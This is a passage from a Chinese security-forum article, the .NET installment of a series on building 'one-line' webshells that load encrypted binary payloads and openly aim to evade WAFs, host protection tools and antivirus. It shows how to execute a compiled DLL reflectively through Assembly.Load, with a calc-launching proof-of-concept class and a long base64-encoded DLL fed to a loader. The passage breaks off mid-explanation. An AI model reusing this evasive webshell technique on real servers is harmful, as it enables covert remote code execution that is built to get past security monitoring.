概述

本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。当然,截止到今天,这三个版本一句话木马也是可以绕过基于主机的各种文件特征检测防护系统的,比如安全狗、D盾以及各种杀毒软件。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:
利用动态二进制加密技术实现新型一句话木马之Java篇
利用动态二进制加密技术实现新型一句话木马之.NET篇
利用动态二进制加密技术实现新型一句话木马之php篇
利用动态二进制加密技术实现新型一句话木马之客户端下载及功能介绍

前言

在上一篇文章《利用动态二进制加密技术实现新型一句话木马之Java篇》中我们介绍了一种可以一劳永逸绕过所有流量型防护系统的思路,并完成了其Java版本的实现,绕过流程大体如下图:

详细内容请参考上一篇文章,现在我们继续实现该思路的.net版本。

实现篇

服务端实现

现有的可以执行任意代码的aspx一句话木马是利用Jscript.net的eval函数来实现的,通过向eval传递Jscript.net源代码来执行任意代码,和asp的eval是同样的效果。这个经典版本的一句话原创者是ISTO团队的kj021320。

1. 实现服务器端动态解析二进制DLL文件

在Java中,每个类经过编译之后都单独对应一个class文件,而在.net中则不同,.net中不存在单个类对应的二进制文件,而是引入了一个叫做Assembly(程序集)的概念,已编译的类是以Assembly的形式来承载的,Assembly是供CLR执行的可执行文件。在.NET下,托管的DLL和EXE都称之为Assembly,一个Assembly可以包含多个类。
而Assembly类提供了一个load方法:

public static System.Reflection.Assembly Load (byte[] rawAssembly);
Loads the assembly with a common object file format (COFF)-based image containing an emitted assembly. The assembly is loaded into the application domain of the caller.

这个方法接收Assembly文件的字节数组,并返回一个Assembly类型的对象。得到Assembly对象之后,我们继续调用该对象的CreateInstance方法,即可实例化dll文件中的类,CreateInstance方法的原型如下:

public object CreateInstance (string typeName);

因此我们只要先用C#写好自己的Payload,然后编译成dll,然后将dll文件的二进制字节流传入Load函数即可实现动态解析执行我们已经编译好的二进制类文件。
下面我们写个demo来测试一下:

Payload.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Diagnostics;

public class Payload
{
    public override bool Equals(Object obj)
    {
        Process.Start("calc.exe");
        return true;
    }
}

这段Payload很简单,就是启动一个计算器。这里我们重写了父类的Equals方法(至于为什么重写Equals方法,请参考上一篇文章《利用动态二进制加密技术实现新型一句话木马之Java篇》)。
把这个类编译成dll文件,并将该文件做一下Base64编码,然后编写如下Demo:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

namespace ConsoleApplication1
{
    class Program
    {
        public static void Main()
        {
            string Payload="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";
            Assembly myAssebly=System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
            Object myPaylaod = myAssebly.CreateInstance("Payload");
            myPaylaod.Equals("");
        }
    }
}

简单解释一下代码:

点击收藏 | 6 关注 | 2
登录 后跟帖